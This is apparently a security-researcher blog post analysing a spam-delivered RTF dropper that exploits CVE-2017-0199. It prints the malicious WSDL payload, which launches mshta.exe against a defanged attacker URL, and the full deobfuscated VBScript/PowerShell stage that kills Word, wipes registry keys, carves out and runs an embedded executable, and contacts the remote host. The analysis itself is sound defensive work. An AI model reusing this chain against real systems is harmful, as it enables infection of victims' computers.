Interesting VBA Dropper
Here is another sample that I found in my spam trap. The technique to infect the victim's computer is interesting. I captured a mail with a malicious RTF document (SHA256: c247929d3f5c82247db9102d2dec28c27f73dc0824f8b386f92aad1a22fd8edd)[1] that exploits the OLE2Link vulnerability (CVE-2017-0199[2]). Once opened, the document fetches the following URL:
hxxp://newsshopper[.]info/news/tp.php?thread=0
It returns the XML content:
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"; xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"; xmlns:suds="http://www.w3.org/2000/wsdl/suds"; xmlns:tns="http://schemas.microsoft.com/clr/ns/System"; xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">; <portType name="PortType"/> <binding name="Binding" type="tns:PortType"> <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>; <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class> </binding> <service name="Service"> <port name="Port" binding="tns:Binding"> <soap:address location="http://localhost_C:\Windows\System32\mshta.exe_hxxp://newsshopper[.]info/news/t.php?thread=0"/>; <soap:address location="\\;\\; System.Diagnostics.Process.Start(_url.Split('_')[1], _url.Split('_')[2]); //"/> </port> </service>
This XML code spawns the mshta.exe to grab a second URL that returns an obfuscated VBA script:
(Note: the script has been beautified for better readability)
<script language="VBScript"> Window.ReSizeTo 0, 0 Window.moveTo -2000,-2000 Dim o,kw,cr1,cr2,ps,d,l,r,wv Set o = CReAtEOBJECt(WsCriPt.SHeLL) wd=o.expAnDenvIRonMEnTStrings(%sYStemROOt%) ps= wd & "\sYSteM32\windowspowershell\v1.0\powershell.exe -WindowStyle Hidden " kw = "taskkill /f /im winword.exe;" d="$" l="[" r="]" cr1="ri -Path """"""HKCU:\Software\Microsoft\Office\" cr2="\Word\Resiliency"""""" -recurse;" o.run ps " Try { $ada="$env:APPDATA\result.exe" $adax=$ada+'x' $f=[System.IO.File]::Create($adax) $tmf="$env:TEMP\o.tmp" taskkill /f /im winword.exe Function pr { Try { $k="HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\"; for ($i = 0; $i -lt 10; $i++) { $r=[System.Text.Encoding]::Unicode.GetString((Get-ItemProperty $k).((Get-Item $k).Property[$i])); if ($r.Contains('.doc')) { $i=10; } } $r=$r.Substring($r.indexOf(':\')-1); $r=$r.Substring(0, $r.IndexOf('.doc')+4); Remove-Item -Path "HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency" -recurse; Copy-Item -Path $r -Destination $tmf; $d = (Get-Content $tmf -ReadCount 0 -encoding byte)[1736901..1757380]; Start-Sleep -s 1; Set-Content $r -encoding byte -Value $d; start winword "$r"; $f = (Get-Content $tmf -ReadCount 0 -encoding byte)[62654..1736893]; Set-Content $ada -encoding byte -Value $f; &$ada; $wc = New-Object system.Net.WebClient; $ht=$wc.downloadString('hxxp://newsshopper[.]info/news/t.php?act=hit'); $cd=(Resolve-Path .\).Path Remove-Item " $cd\*" -include http*.pdb, http*.dll, *.cs;" & " } Catch { } }; $wv='12.0'; pr; $wv='14.0'; pr; $wv='15.0'; pr;" $wv='16.0'; pr; Stop-Process -processname powershell; } Catch{ exit; }",0,true self.close </script>
Basically, what the script does:
It kills the existing winword.exe processes. For different versions of Microsoft Office (from 12.0 to 16.0), it scans the latest opened documents and extracts the one that was just opened. From the original document, another one is extracted at offset 1736901 (0x1A80C5) and a new Word instance is spawned to display it. It's just a simple form, not malicious (SHA256: c73573f83fe53cb076c5cc1156c1356f4e92424a9f1824511327fcf4dfc70c79). In parallel, the original is also padded with a PE file starting at offset 62654 (0xF4BE):
0000f4b0 69 6f 6e 68 69 67 68 ba ba ba ba ba ba ba 4d 5a |ionhigh.......MZ| 0000f4c0 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 |................| 0000f4d0 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 |......@.........| 0000f4e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 0000f4f0 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f |................| 0000f500 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 |......!..L.!This| 0000f510 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 | program cannot | 0000f520 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f |be run in DOS mo| 0000f530 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7e 04 |de....$.......~.| 0000f540 fc 49 3a 65 92 1a 3a 65 92 1a 3a 65 92 1a 8e f9 |.I:e..:e..:e....| 0000f550 63 1a 33 65 92 1a 8e f9 61 1a 40 65 92 1a 8e f9 |c.3e....a.@e....| 0000f560 60 1a 22 65 92 1a 01 3b 91 1b 28 65 92 1a 01 3b |`."e...;..(e...;| 0000f570 96 1b 28 65 92 1a 01 3b 97 1b 1f 65 92 1a 33 1d |..(e...;...e..3.| 0000f580 01 1a 3f 65 92 1a 3a 65 93 1a 58 65 92 1a a8 3b |..?e..:e..Xe...;| 0000f590 97 1b 3b 65 92 1a a8 3b 6d 1a 3b 65 92 1a a8 3b |..;e...;m.;e...;| 0000f5a0 90 1b 3b 65 92 1a 52 69 63 68 3a 65 92 1a 00 00 |..;e..Rich:e....| 0000f5b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 |..............PE| 0000f5c0 00 00 4c 01 06 00 5e 2a ff 59 00 00 00 00 00 00 |..L...^*.Y......| 0000f5d0 00 00 e0 00 02 01 0b 01 0e 00 00 b8 03 00 00 5c |...............\|
The file is extracted and executed (SHA256: a561c28196d1736345e1dc49edc97d3f8499236da2e92f4da97ff307de3d1db8).
The VBA script also downloads another PE file (SHA256: 2cb8b35ca2c74fae08d4fa319a86e12d7a90860bafc8276394359f9fc704874f) but it seems to be unused(?).
[1] https://www.virustotal.com/#/file/c247929d3f5c82247db9102d2dec28c27f73dc0824f8b386f92aad1a22fd8edd/detection
[2] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments